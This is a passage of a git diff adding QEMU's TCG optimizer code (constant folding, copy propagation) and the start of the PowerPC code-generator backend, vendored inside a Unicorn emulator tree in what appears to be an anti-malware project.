+ TCGArg bl = p2[0], bh = p2[1]; + + if (temps[bl].state == TCG_TEMP_CONST + && temps[bh].state == TCG_TEMP_CONST) { + uint64_t b = ((uint64_t)temps[bh].val << 32) | (uint32_t)temps[bl].val; + + if (temps[al].state == TCG_TEMP_CONST + && temps[ah].state == TCG_TEMP_CONST) { + uint64_t a; + a = ((uint64_t)temps[ah].val << 32) | (uint32_t)temps[al].val; + return do_constant_folding_cond_64(a, b, c); + } + if (b == 0) { + switch (c) { + case TCG_COND_LTU: + return 0; + case TCG_COND_GEU: + return 1; + default: + break; + } + } + } + if (temps_are_copies(s, al, bl) && temps_are_copies(s, ah, bh)) { + return do_constant_folding_cond_eq(c); + } + return 2; +} + +static bool swap_commutative(TCGContext *s, TCGArg dest, TCGArg *p1, TCGArg *p2) +{ + struct tcg_temp_info *temps = s->temps2; + TCGArg a1 = *p1, a2 = *p2; + int sum = 0; + + sum += temps[a1].state == TCG_TEMP_CONST; + sum -= temps[a2].state == TCG_TEMP_CONST; + + /* Prefer the constant in second argument, and then the form + op a, a, b, which is better handled on non-RISC hosts. */ + if (sum > 0 || (sum == 0 && dest == a2)) { + *p1 = a2; + *p2 = a1; + return true; + } + return false; +} + +static bool swap_commutative2(TCGContext *s, TCGArg *p1, TCGArg *p2) +{ + struct tcg_temp_info *temps = s->temps2; + int sum = 0; + + sum += temps[p1[0]].state == TCG_TEMP_CONST; + sum += temps[p1[1]].state == TCG_TEMP_CONST; + sum -= temps[p2[0]].state == TCG_TEMP_CONST; + sum -= temps[p2[1]].state == TCG_TEMP_CONST; + if (sum > 0) { + TCGArg t; + t = p1[0], p1[0] = p2[0], p2[0] = t; + t = p1[1], p1[1] = p2[1], p2[1] = t; + return true; + } + return false; +} + +/* Propagate constants and copies, fold constant expressions. */ +static TCGArg *tcg_constant_folding(TCGContext *s, uint16_t *tcg_opc_ptr, + TCGArg *args, TCGOpDef *tcg_op_defs) +{ + struct tcg_temp_info *temps = s->temps2; + int nb_ops, op_index, nb_temps, nb_globals; + TCGArg *gen_args; + + /* Array VALS has an element for each temp. + If this temp holds a constant then its value is kept in VALS' element. + If this temp is a copy of other ones then the other copies are + available through the doubly linked circular list. */ + + nb_temps = s->nb_temps; + nb_globals = s->nb_globals; + reset_all_temps(s, nb_temps); + + nb_ops = tcg_opc_ptr - s->gen_opc_buf; + if (nb_ops > OPC_BUF_SIZE) { + return NULL; + } + gen_args = args; + for (op_index = 0; op_index < nb_ops; op_index++) { + TCGOpcode op = s->gen_opc_buf[op_index]; + const TCGOpDef *def = &tcg_op_defs[op]; + tcg_target_ulong mask, partmask, affected; + int nb_oargs, nb_iargs, nb_args, i; + TCGArg tmp; + + if (op == INDEX_op_call) { + *gen_args++ = tmp = *args++; + nb_oargs = tmp >> 16; + nb_iargs = tmp & 0xffff; + nb_args = nb_oargs + nb_iargs + def->nb_cargs; + } else { + nb_oargs = def->nb_oargs; + nb_iargs = def->nb_iargs; + nb_args = def->nb_args; + } + + /* Do copy propagation */ + for (i = nb_oargs; i < nb_oargs + nb_iargs; i++) { + if (temps[args[i]].state == TCG_TEMP_COPY) { + args[i] = find_better_copy(s, args[i]); + } + } + + /* For commutative operations make constant second argument */ + switch (op) { + CASE_OP_32_64(add): + CASE_OP_32_64(mul): + CASE_OP_32_64(and): + CASE_OP_32_64(or): + CASE_OP_32_64(xor): + CASE_OP_32_64(eqv): + CASE_OP_32_64(nand): + CASE_OP_32_64(nor): + CASE_OP_32_64(muluh): + CASE_OP_32_64(mulsh): + swap_commutative(s, args[0], &args[1], &args[2]); + break; + CASE_OP_32_64(brcond): + if (swap_commutative(s, -1, &args[0], &args[1])) { + args[2] = tcg_swap_cond(args[2]); + } + break; + CASE_OP_32_64(setcond): + if (swap_commutative(s, args[0], &args[1], &args[2])) { + args[3] = tcg_swap_cond(args[3]); + } + break; + CASE_OP_32_64(movcond): + if (swap_commutative(s, -1, &args[1], &args[2])) { + args[5] = tcg_swap_cond(args[5]); + } + /* For movcond, we canonicalize the "false" input reg to match + the destination reg so that the tcg backend can implement + a "move if true" operation. */ + if (swap_commutative(s, args[0], &args[4], &args[3])) { + args[5] = tcg_invert_cond(args[5]); + } + break; + CASE_OP_32_64(add2): + swap_commutative(s, args[0], &args[2], &args[4]); + swap_commutative(s, args[1], &args[3], &args[5]); + break; + CASE_OP_32_64(mulu2): + CASE_OP_32_64(muls2): + swap_commutative(s, args[0], &args[2], &args[3]); + break; + case INDEX_op_brcond2_i32: + if (swap_commutative2(s, &args[0], &args[2])) { + args[4] = tcg_swap_cond(args[4]); + } + break; + case INDEX_op_setcond2_i32: + if (swap_commutative2(s, &args[1], &args[3])) { + args[5] = tcg_swap_cond(args[5]); + } + break; + default: + break; + } + + /* Simplify expressions for "shift/rot r, 0, a => movi r, 0", + and "sub r, 0, a => neg r, a" case. */ + switch (op) { + CASE_OP_32_64(shl): + CASE_OP_32_64(shr): + CASE_OP_32_64(sar): + CASE_OP_32_64(rotl): + CASE_OP_32_64(rotr): + if (temps[args[1]].state == TCG_TEMP_CONST + && temps[args[1]].val == 0) { + tcg_opt_gen_movi(s, op_index, gen_args, op, args[0], 0); + args += 3; + gen_args += 2; + continue; + } + break; + CASE_OP_32_64(sub): + { + TCGOpcode neg_op; + bool have_neg; + + if (temps[args[2]].state == TCG_TEMP_CONST) { + /* Proceed with possible constant folding. */ + break; + } + if (op == INDEX_op_sub_i32) { + neg_op = INDEX_op_neg_i32; + have_neg = TCG_TARGET_HAS_neg_i32; + } else { + neg_op = INDEX_op_neg_i64; + have_neg = TCG_TARGET_HAS_neg_i64; + } + if (!have_neg) { + break; + } + if (temps[args[1]].state == TCG_TEMP_CONST + && temps[args[1]].val == 0) { + s->gen_opc_buf[op_index] = neg_op; + reset_temp(s, args[0]); + gen_args[0] = args[0]; + gen_args[1] = args[2]; + args += 3; + gen_args += 2; + continue; + } + } + break; + CASE_OP_32_64(xor): + CASE_OP_32_64(nand): + if (temps[args[1]].state != TCG_TEMP_CONST + && temps[args[2]].state == TCG_TEMP_CONST + && temps[args[2]].val == -1) { + i = 1; + goto try_not; + } + break; + CASE_OP_32_64(nor): + if (temps[args[1]].state != TCG_TEMP_CONST + && temps[args[2]].state == TCG_TEMP_CONST + && temps[args[2]].val == 0) { + i = 1; + goto try_not; + } + break; + CASE_OP_32_64(andc): + if (temps[args[2]].state != TCG_TEMP_CONST + && temps[args[1]].state == TCG_TEMP_CONST + && temps[args[1]].val == -1) { + i = 2; + goto try_not; + } + break; + CASE_OP_32_64(orc): + CASE_OP_32_64(eqv): + if (temps[args[2]].state != TCG_TEMP_CONST + && temps[args[1]].state == TCG_TEMP_CONST + && temps[args[1]].val == 0) { + i = 2; + goto try_not; + } + break; + try_not: + { + TCGOpcode not_op; + bool have_not; + + if (def->flags & TCG_OPF_64BIT) { + not_op = INDEX_op_not_i64; + have_not = TCG_TARGET_HAS_not_i64; + } else { + not_op = INDEX_op_not_i32; + have_not = TCG_TARGET_HAS_not_i32; + } + if (!have_not) { + break; + } + s->gen_opc_buf[op_index] = not_op; + reset_temp(s, args[0]); + gen_args[0] = args[0]; + gen_args[1] = args[i]; + args += 3; + gen_args += 2; + continue; + } + default: + break; + } + + /* Simplify expression for "op r, a, const => mov r, a" cases */ + switch (op) { + CASE_OP_32_64(add): + CASE_OP_32_64(sub): + CASE_OP_32_64(shl): + CASE_OP_32_64(shr): + CASE_OP_32_64(sar): + CASE_OP_32_64(rotl): + CASE_OP_32_64(rotr): + CASE_OP_32_64(or): + CASE_OP_32_64(xor): + CASE_OP_32_64(andc): + if (temps[args[1]].state != TCG_TEMP_CONST + && temps[args[2]].state == TCG_TEMP_CONST + && temps[args[2]].val == 0) { + goto do_mov3; + } + break; + CASE_OP_32_64(and): + CASE_OP_32_64(orc): + CASE_OP_32_64(eqv): + if (temps[args[1]].state != TCG_TEMP_CONST + && temps[args[2]].state == TCG_TEMP_CONST + && temps[args[2]].val == -1) { + goto do_mov3; + } + break; + do_mov3: + if (temps_are_copies(s, args[0], args[1])) { + s->gen_opc_buf[op_index] = INDEX_op_nop; + } else { + tcg_opt_gen_mov(s, op_index, gen_args, op, args[0], args[1]); + gen_args += 2; + } + args += 3; + continue; + default: + break; + } + + /* Simplify using known-zero bits. Currently only ops with a single + output argument is supported. */ + mask = -1; + affected = -1; + switch (op) { + CASE_OP_32_64(ext8s): + if ((temps[args[1]].mask & 0x80) != 0) { + break; + } + CASE_OP_32_64(ext8u): + mask = 0xff; + goto and_const; + CASE_OP_32_64(ext16s): + if ((temps[args[1]].mask & 0x8000) != 0) { + break; + } + CASE_OP_32_64(ext16u): + mask = 0xffff; + goto and_const; + case INDEX_op_ext32s_i64: + if ((temps[args[1]].mask & 0x80000000) != 0) { + break; + } + case INDEX_op_ext32u_i64: + mask = 0xffffffffU; + goto and_const; + + CASE_OP_32_64(and): + mask = temps[args[2]].mask; + if (temps[args[2]].state == TCG_TEMP_CONST) { + and_const: + affected = temps[args[1]].mask & ~mask; + } + mask = temps[args[1]].mask & mask; + break; + + CASE_OP_32_64(andc): + /* Known-zeros does not imply known-ones. Therefore unless + args[2] is constant, we can't infer anything from it. */ + if (temps[args[2]].state == TCG_TEMP_CONST) { + mask = ~temps[args[2]].mask; + goto and_const; + } + /* But we certainly know nothing outside args[1] may be set. */ + mask = temps[args[1]].mask; + break; + + case INDEX_op_sar_i32: + if (temps[args[2]].state == TCG_TEMP_CONST) { + tmp = temps[args[2]].val & 31; + mask = (int32_t)temps[args[1]].mask >> tmp; + } + break; + case INDEX_op_sar_i64: + if (temps[args[2]].state == TCG_TEMP_CONST) { + tmp = temps[args[2]].val & 63; + mask = (int64_t)temps[args[1]].mask >> tmp; + } + break; + + case INDEX_op_shr_i32: + if (temps[args[2]].state == TCG_TEMP_CONST) { + tmp = temps[args[2]].val & 31; + mask = (uint32_t)temps[args[1]].mask >> tmp; + } + break; + case INDEX_op_shr_i64: + if (temps[args[2]].state == TCG_TEMP_CONST) { + tmp = temps[args[2]].val & 63; + mask = (uint64_t)temps[args[1]].mask >> tmp; + } + break; + + case INDEX_op_trunc_shr_i32: + mask = (uint64_t)temps[args[1]].mask >> args[2]; + break; + + CASE_OP_32_64(shl): + if (temps[args[2]].state == TCG_TEMP_CONST) { + tmp = temps[args[2]].val & (TCG_TARGET_REG_BITS - 1); + mask = temps[args[1]].mask << tmp; + } + break; + + CASE_OP_32_64(neg): + /* Set to 1 all bits to the left of the rightmost. */ + mask = 0-(temps[args[1]].mask & (0-temps[args[1]].mask)); + break; + + CASE_OP_32_64(deposit): + mask = (tcg_target_ulong)deposit64(temps[args[1]].mask, args[3], args[4], + temps[args[2]].mask); + break; + + CASE_OP_32_64(or): + CASE_OP_32_64(xor): + mask = temps[args[1]].mask | temps[args[2]].mask; + break; + + CASE_OP_32_64(setcond): + case INDEX_op_setcond2_i32: + mask = 1; + break; + + CASE_OP_32_64(movcond): + mask = temps[args[3]].mask | temps[args[4]].mask; + break; + + CASE_OP_32_64(ld8u): + mask = 0xff; + break; + CASE_OP_32_64(ld16u): + mask = 0xffff; + break; + case INDEX_op_ld32u_i64: + mask = 0xffffffffu; + break; + + CASE_OP_32_64(qemu_ld): + { + TCGMemOp mop = args[nb_oargs + nb_iargs]; + if (!(mop & MO_SIGN)) { + mask = (2ULL << ((8 << (mop & MO_SIZE)) - 1)) - 1; + } + } + break; + + default: + break; + } + + /* 32-bit ops generate 32-bit results. For the result is zero test + below, we can ignore high bits, but for further optimizations we + need to record that the high bits contain garbage. */ + partmask = mask; + if (!(def->flags & TCG_OPF_64BIT)) { + mask |= ~(tcg_target_ulong)0xffffffffu; + partmask &= 0xffffffffu; + affected &= 0xffffffffu; + } + + if (partmask == 0) { + assert(nb_oargs == 1); + tcg_opt_gen_movi(s, op_index, gen_args, op, args[0], 0); + args += nb_args; + gen_args += 2; + continue; + } + if (affected == 0) { + assert(nb_oargs == 1); + if (temps_are_copies(s, args[0], args[1])) { + s->gen_opc_buf[op_index] = INDEX_op_nop; + } else if (temps[args[1]].state != TCG_TEMP_CONST) { + tcg_opt_gen_mov(s, op_index, gen_args, op, args[0], args[1]); + gen_args += 2; + } else { + tcg_opt_gen_movi(s, op_index, gen_args, op, + args[0], temps[args[1]].val); + gen_args += 2; + } + args += nb_args; + continue; + } + + /* Simplify expression for "op r, a, 0 => movi r, 0" cases */ + switch (op) { + CASE_OP_32_64(and): + CASE_OP_32_64(mul): + CASE_OP_32_64(muluh): + CASE_OP_32_64(mulsh): + if ((temps[args[2]].state == TCG_TEMP_CONST + && temps[args[2]].val == 0)) { + tcg_opt_gen_movi(s, op_index, gen_args, op, args[0], 0); + args += 3; + gen_args += 2; + continue; + } + break; + default: + break; + } + + /* Simplify expression for "op r, a, a => mov r, a" cases */ + switch (op) { + CASE_OP_32_64(or): + CASE_OP_32_64(and): + if (temps_are_copies(s, args[1], args[2])) { + if (temps_are_copies(s, args[0], args[1])) { + s->gen_opc_buf[op_index] = INDEX_op_nop; + } else { + tcg_opt_gen_mov(s, op_index, gen_args, op, + args[0], args[1]); + gen_args += 2; + } + args += 3; + continue; + } + break; + default: + break; + } + + /* Simplify expression for "op r, a, a => movi r, 0" cases */ + switch (op) { + CASE_OP_32_64(andc): + CASE_OP_32_64(sub): + CASE_OP_32_64(xor): + if (temps_are_copies(s, args[1], args[2])) { + tcg_opt_gen_movi(s, op_index, gen_args, op, args[0], 0); + gen_args += 2; + args += 3; + continue; + } + break; + default: + break; + } + + /* Propagate constants through copy operations and do constant + folding. Constants will be substituted to arguments by register + allocator where needed and possible. Also detect copies. */ + switch (op) { + CASE_OP_32_64(mov): + if (temps_are_copies(s, args[0], args[1])) { + args += 2; + s->gen_opc_buf[op_index] = INDEX_op_nop; + break; + } + if (temps[args[1]].state != TCG_TEMP_CONST) { + tcg_opt_gen_mov(s, op_index, gen_args, op, args[0], args[1]); + gen_args += 2; + args += 2; + break; + } + /* Source argument is constant. Rewrite the operation and + let movi case handle it. */ + args[1] = temps[args[1]].val; + /* fallthrough */ + CASE_OP_32_64(movi): + tcg_opt_gen_movi(s, op_index, gen_args, op, args[0], args[1]); + gen_args += 2; + args += 2; + break; + + CASE_OP_32_64(not): + CASE_OP_32_64(neg): + CASE_OP_32_64(ext8s): + CASE_OP_32_64(ext8u): + CASE_OP_32_64(ext16s): + CASE_OP_32_64(ext16u): + case INDEX_op_ext32s_i64: + case INDEX_op_ext32u_i64: + if (temps[args[1]].state == TCG_TEMP_CONST) { + tmp = do_constant_folding(s, op, temps[args[1]].val, 0); + tcg_opt_gen_movi(s, op_index, gen_args, op, args[0], tmp); + gen_args += 2; + args += 2; + break; + } + goto do_default; + + case INDEX_op_trunc_shr_i32: + if (temps[args[1]].state == TCG_TEMP_CONST) { + tmp = do_constant_folding(s, op, temps[args[1]].val, args[2]); + tcg_opt_gen_movi(s, op_index, gen_args, op, args[0], tmp); + gen_args += 2; + args += 3; + break; + } + goto do_default; + + CASE_OP_32_64(add): + CASE_OP_32_64(sub): + CASE_OP_32_64(mul): + CASE_OP_32_64(or): + CASE_OP_32_64(and): + CASE_OP_32_64(xor): + CASE_OP_32_64(shl): + CASE_OP_32_64(shr): + CASE_OP_32_64(sar): + CASE_OP_32_64(rotl): + CASE_OP_32_64(rotr): + CASE_OP_32_64(andc): + CASE_OP_32_64(orc): + CASE_OP_32_64(eqv): + CASE_OP_32_64(nand): + CASE_OP_32_64(nor): + CASE_OP_32_64(muluh): + CASE_OP_32_64(mulsh): + CASE_OP_32_64(div): + CASE_OP_32_64(divu): + CASE_OP_32_64(rem): + CASE_OP_32_64(remu): + if (temps[args[1]].state == TCG_TEMP_CONST + && temps[args[2]].state == TCG_TEMP_CONST) { + tmp = do_constant_folding(s, op, temps[args[1]].val, + temps[args[2]].val); + tcg_opt_gen_movi(s, op_index, gen_args, op, args[0], tmp); + gen_args += 2; + args += 3; + break; + } + goto do_default; + + CASE_OP_32_64(deposit): + if (temps[args[1]].state == TCG_TEMP_CONST + && temps[args[2]].state == TCG_TEMP_CONST) { + tmp = (TCGArg)deposit64(temps[args[1]].val, args[3], args[4], + temps[args[2]].val); + tcg_opt_gen_movi(s, op_index, gen_args, op, args[0], tmp); + gen_args += 2; + args += 5; + break; + } + goto do_default; + + CASE_OP_32_64(setcond): + tmp = do_constant_folding_cond(s, op, args[1], args[2], args[3]); + if (tmp != 2) { + tcg_opt_gen_movi(s, op_index, gen_args, op, args[0], tmp); + gen_args += 2; + args += 4; + break; + } + goto do_default; + + CASE_OP_32_64(brcond): + tmp = do_constant_folding_cond(s, op, args[0], args[1], args[2]); + if (tmp != 2) { + if (tmp) { + reset_all_temps(s, nb_temps); + s->gen_opc_buf[op_index] = INDEX_op_br; + gen_args[0] = args[3]; + gen_args += 1; + } else { + s->gen_opc_buf[op_index] = INDEX_op_nop; + } + args += 4; + break; + } + goto do_default; + + CASE_OP_32_64(movcond): + tmp = do_constant_folding_cond(s, op, args[1], args[2], args[5]); + if (tmp != 2) { + if (temps_are_copies(s, args[0], args[4-tmp])) { + s->gen_opc_buf[op_index] = INDEX_op_nop; + } else if (temps[args[4-tmp]].state == TCG_TEMP_CONST) { + tcg_opt_gen_movi(s, op_index, gen_args, op, + args[0], temps[args[4-tmp]].val); + gen_args += 2; + } else { + tcg_opt_gen_mov(s, op_index, gen_args, op, + args[0], args[4-tmp]); + gen_args += 2; + } + args += 6; + break; + } + goto do_default; + + case INDEX_op_add2_i32: + case INDEX_op_sub2_i32: + if (temps[args[2]].state == TCG_TEMP_CONST + && temps[args[3]].state == TCG_TEMP_CONST + && temps[args[4]].state == TCG_TEMP_CONST + && temps[args[5]].state == TCG_TEMP_CONST) { + uint32_t al = temps[args[2]].val; + uint32_t ah = temps[args[3]].val; + uint32_t bl = temps[args[4]].val; + uint32_t bh = temps[args[5]].val; + uint64_t a = ((uint64_t)ah << 32) | al; + uint64_t b = ((uint64_t)bh << 32) | bl; + TCGArg rl, rh; + + if (op == INDEX_op_add2_i32) { + a += b; + } else { + a -= b; + } + + /* We emit the extra nop when we emit the add2/sub2. */ + assert(s->gen_opc_buf[op_index + 1] == INDEX_op_nop); + + rl = args[0]; + rh = args[1]; + tcg_opt_gen_movi(s, op_index, &gen_args[0], + op, rl, (uint32_t)a); + tcg_opt_gen_movi(s, ++op_index, &gen_args[2], + op, rh, (uint32_t)(a >> 32)); + gen_args += 4; + args += 6; + break; + } + goto do_default; + + case INDEX_op_mulu2_i32: + if (temps[args[2]].state == TCG_TEMP_CONST + && temps[args[3]].state == TCG_TEMP_CONST) { + uint32_t a = temps[args[2]].val; + uint32_t b = temps[args[3]].val; + uint64_t r = (uint64_t)a * b; + TCGArg rl, rh; + + /* We emit the extra nop when we emit the mulu2. */ + assert(s->gen_opc_buf[op_index + 1] == INDEX_op_nop); + + rl = args[0]; + rh = args[1]; + tcg_opt_gen_movi(s, op_index, &gen_args[0], + op, rl, (uint32_t)r); + tcg_opt_gen_movi(s, ++op_index, &gen_args[2], + op, rh, (uint32_t)(r >> 32)); + gen_args += 4; + args += 4; + break; + } + goto do_default; + + case INDEX_op_brcond2_i32: + tmp = do_constant_folding_cond2(s, &args[0], &args[2], args[4]); + if (tmp != 2) { + if (tmp) { + do_brcond_true: + reset_all_temps(s, nb_temps); + s->gen_opc_buf[op_index] = INDEX_op_br; + gen_args[0] = args[5]; + gen_args += 1; + } else { + do_brcond_false: + s->gen_opc_buf[op_index] = INDEX_op_nop; + } + } else if ((args[4] == TCG_COND_LT || args[4] == TCG_COND_GE) + && temps[args[2]].state == TCG_TEMP_CONST + && temps[args[3]].state == TCG_TEMP_CONST + && temps[args[2]].val == 0 + && temps[args[3]].val == 0) { + /* Simplify LT/GE comparisons vs zero to a single compare + vs the high word of the input. */ + do_brcond_high: + reset_all_temps(s, nb_temps); + s->gen_opc_buf[op_index] = INDEX_op_brcond_i32; + gen_args[0] = args[1]; + gen_args[1] = args[3]; + gen_args[2] = args[4]; + gen_args[3] = args[5]; + gen_args += 4; + } else if (args[4] == TCG_COND_EQ) { + /* Simplify EQ comparisons where one of the pairs + can be simplified. */ + tmp = do_constant_folding_cond(s, INDEX_op_brcond_i32, + args[0], args[2], TCG_COND_EQ); + if (tmp == 0) { + goto do_brcond_false; + } else if (tmp == 1) { + goto do_brcond_high; + } + tmp = do_constant_folding_cond(s, INDEX_op_brcond_i32, + args[1], args[3], TCG_COND_EQ); + if (tmp == 0) { + goto do_brcond_false; + } else if (tmp != 1) { + goto do_default; + } + do_brcond_low: + reset_all_temps(s, nb_temps); + s->gen_opc_buf[op_index] = INDEX_op_brcond_i32; + gen_args[0] = args[0]; + gen_args[1] = args[2]; + gen_args[2] = args[4]; + gen_args[3] = args[5]; + gen_args += 4; + } else if (args[4] == TCG_COND_NE) { + /* Simplify NE comparisons where one of the pairs + can be simplified. */ + tmp = do_constant_folding_cond(s, INDEX_op_brcond_i32, + args[0], args[2], TCG_COND_NE); + if (tmp == 0) { + goto do_brcond_high; + } else if (tmp == 1) { + goto do_brcond_true; + } + tmp = do_constant_folding_cond(s, INDEX_op_brcond_i32, + args[1], args[3], TCG_COND_NE); + if (tmp == 0) { + goto do_brcond_low; + } else if (tmp == 1) { + goto do_brcond_true; + } + goto do_default; + } else { + goto do_default; + } + args += 6; + break; + + case INDEX_op_setcond2_i32: + tmp = do_constant_folding_cond2(s, &args[1], &args[3], args[5]); + if (tmp != 2) { + do_setcond_const: + tcg_opt_gen_movi(s, op_index, gen_args, op, args[0], tmp); + gen_args += 2; + } else if ((args[5] == TCG_COND_LT || args[5] == TCG_COND_GE) + && temps[args[3]].state == TCG_TEMP_CONST + && temps[args[4]].state == TCG_TEMP_CONST + && temps[args[3]].val == 0 + && temps[args[4]].val == 0) { + /* Simplify LT/GE comparisons vs zero to a single compare + vs the high word of the input. */ + do_setcond_high: + s->gen_opc_buf[op_index] = INDEX_op_setcond_i32; + reset_temp(s, args[0]); + temps[args[0]].mask = 1; + gen_args[0] = args[0]; + gen_args[1] = args[2]; + gen_args[2] = args[4]; + gen_args[3] = args[5]; + gen_args += 4; + } else if (args[5] == TCG_COND_EQ) { + /* Simplify EQ comparisons where one of the pairs + can be simplified. */ + tmp = do_constant_folding_cond(s, INDEX_op_setcond_i32, + args[1], args[3], TCG_COND_EQ); + if (tmp == 0) { + goto do_setcond_const; + } else if (tmp == 1) { + goto do_setcond_high; + } + tmp = do_constant_folding_cond(s, INDEX_op_setcond_i32, + args[2], args[4], TCG_COND_EQ); + if (tmp == 0) { + goto do_setcond_high; + } else if (tmp != 1) { + goto do_default; + } + do_setcond_low: + reset_temp(s, args[0]); + temps[args[0]].mask = 1; + s->gen_opc_buf[op_index] = INDEX_op_setcond_i32; + gen_args[0] = args[0]; + gen_args[1] = args[1]; + gen_args[2] = args[3]; + gen_args[3] = args[5]; + gen_args += 4; + } else if (args[5] == TCG_COND_NE) { + /* Simplify NE comparisons where one of the pairs + can be simplified. */ + tmp = do_constant_folding_cond(s, INDEX_op_setcond_i32, + args[1], args[3], TCG_COND_NE); + if (tmp == 0) { + goto do_setcond_high; + } else if (tmp == 1) { + goto do_setcond_const; + } + tmp = do_constant_folding_cond(s, INDEX_op_setcond_i32, + args[2], args[4], TCG_COND_NE); + if (tmp == 0) { + goto do_setcond_low; + } else if (tmp == 1) { + goto do_setcond_const; + } + goto do_default; + } else { + goto do_default; + } + args += 6; + break; + + case INDEX_op_call: + if (!(args[nb_oargs + nb_iargs + 1] + & (TCG_CALL_NO_READ_GLOBALS | TCG_CALL_NO_WRITE_GLOBALS))) { + for (i = 0; i < nb_globals; i++) { + reset_temp(s, i); + } + } + goto do_reset_output; + + default: + do_default: + /* Default case: we know nothing about operation (or were unable + to compute the operation result) so no propagation is done. + We trash everything if the operation is the end of a basic + block, otherwise we only trash the output args. "mask" is + the non-zero bits mask for the first output arg. */ + if (def->flags & TCG_OPF_BB_END) { + reset_all_temps(s, nb_temps); + } else { + do_reset_output: + for (i = 0; i < nb_oargs; i++) { + if (args[i] >= TCG_MAX_TEMPS) { + continue; + } + reset_temp(s, args[i]); + /* Save the corresponding known-zero bits mask for the + first output argument (only one supported so far). */ + if (i == 0) { + temps[args[i]].mask = mask; + } + } + } + for (i = 0; i < nb_args; i++) { + gen_args[i] = args[i]; + } + args += nb_args; + gen_args += nb_args; + break; + } + } + + return gen_args; +} + +TCGArg *tcg_optimize(TCGContext *s, uint16_t *tcg_opc_ptr, + TCGArg *args, TCGOpDef *tcg_op_defs) +{ + TCGArg *res; + res = tcg_constant_folding(s, tcg_opc_ptr, args, tcg_op_defs); + return res; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/ppc/tcg-target.c b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/ppc/tcg-target.c new file mode 100644 index 0000000..cd7aabd --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/ppc/tcg-target.c @@ -0,0 +1,2672 @@ +/* + * Tiny Code Generator for QEMU + * + * Copyright (c) 2008 Fabrice Bellard + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + */ + +#include "tcg-be-ldst.h" + +#if defined _CALL_DARWIN || defined __APPLE__ +#define TCG_TARGET_CALL_DARWIN +#endif +#ifdef _CALL_SYSV +# define TCG_TARGET_CALL_ALIGN_ARGS 1 +#endif + +/* For some memory operations, we need a scratch that isn't R0. For the AIX + calling convention, we can re-use the TOC register since we'll be reloading + it at every call. Otherwise R12 will do nicely as neither a call-saved + register nor a parameter register. */ +#ifdef _CALL_AIX +# define TCG_REG_TMP1 TCG_REG_R2 +#else +# define TCG_REG_TMP1 TCG_REG_R12 +#endif + +/* For the 64-bit target, we don't like the 5 insn sequence needed to build + full 64-bit addresses. Better to have a base register to which we can + apply a 32-bit displacement. + + There are generally three items of interest: + (1) helper functions in the main executable, + (2) TranslationBlock data structures, + (3) the return address in the epilogue. + + For user-only, we USE_STATIC_CODE_GEN_BUFFER, so the code_gen_buffer + will be inside the main executable, and thus near enough to make a + pointer to the epilogue be within 2GB of all helper functions. + + For softmmu, we'll let the kernel choose the address of code_gen_buffer, + and odds are it'll be somewhere close to the main malloc arena, and so + a pointer to the epilogue will be within 2GB of the TranslationBlocks. + + For --enable-pie, everything will be kinda near everything else, + somewhere in high memory. + + Thus we choose to keep the return address in a call-saved register. */ +#define TCG_REG_RA TCG_REG_R31 +#define USE_REG_RA (TCG_TARGET_REG_BITS == 64) + +/* Shorthand for size of a pointer. Avoid promotion to unsigned. */ +#define SZP ((int)sizeof(void *)) + +/* Shorthand for size of a register. */ +#define SZR (TCG_TARGET_REG_BITS / 8) + +#define TCG_CT_CONST_S16 0x100 +#define TCG_CT_CONST_U16 0x200 +#define TCG_CT_CONST_S32 0x400 +#define TCG_CT_CONST_U32 0x800 +#define TCG_CT_CONST_ZERO 0x1000 +#define TCG_CT_CONST_MONE 0x2000 + +static tcg_insn_unit *tb_ret_addr; + +#ifndef GUEST_BASE +#define GUEST_BASE 0 +#endif + +#include "elf.h" +static bool have_isa_2_06; +#define HAVE_ISA_2_06 have_isa_2_06 +#define HAVE_ISEL have_isa_2_06 + +#ifdef CONFIG_USE_GUEST_BASE +#define TCG_GUEST_BASE_REG 30 +#else +#define TCG_GUEST_BASE_REG 0 +#endif + +#ifndef NDEBUG +static const char * const tcg_target_reg_names[TCG_TARGET_NB_REGS] = { + "r0", + "r1", + "r2", + "r3", + "r4", + "r5", + "r6", + "r7", + "r8", + "r9", + "r10", + "r11", + "r12", + "r13", + "r14", + "r15", + "r16", + "r17", + "r18", + "r19", + "r20", + "r21", + "r22", + "r23", + "r24", + "r25", + "r26", + "r27", + "r28", + "r29", + "r30", + "r31" +}; +#endif + +static const int tcg_target_reg_alloc_order[] = { + TCG_REG_R14, /* call saved registers */ + TCG_REG_R15, + TCG_REG_R16, + TCG_REG_R17, + TCG_REG_R18, + TCG_REG_R19, + TCG_REG_R20, + TCG_REG_R21, + TCG_REG_R22, + TCG_REG_R23, + TCG_REG_R24, + TCG_REG_R25, + TCG_REG_R26, + TCG_REG_R27, + TCG_REG_R28, + TCG_REG_R29, + TCG_REG_R30, + TCG_REG_R31, + TCG_REG_R12, /* call clobbered, non-arguments */ + TCG_REG_R11, + TCG_REG_R2, + TCG_REG_R13, + TCG_REG_R10, /* call clobbered, arguments */ + TCG_REG_R9, + TCG_REG_R8, + TCG_REG_R7, + TCG_REG_R6, + TCG_REG_R5, + TCG_REG_R4, + TCG_REG_R3, +}; + +static const int tcg_target_call_iarg_regs[] = { + TCG_REG_R3, + TCG_REG_R4, + TCG_REG_R5, + TCG_REG_R6, + TCG_REG_R7, + TCG_REG_R8, + TCG_REG_R9, + TCG_REG_R10 +}; + +static const int tcg_target_call_oarg_regs[] = { + TCG_REG_R3, + TCG_REG_R4 +}; + +static const int 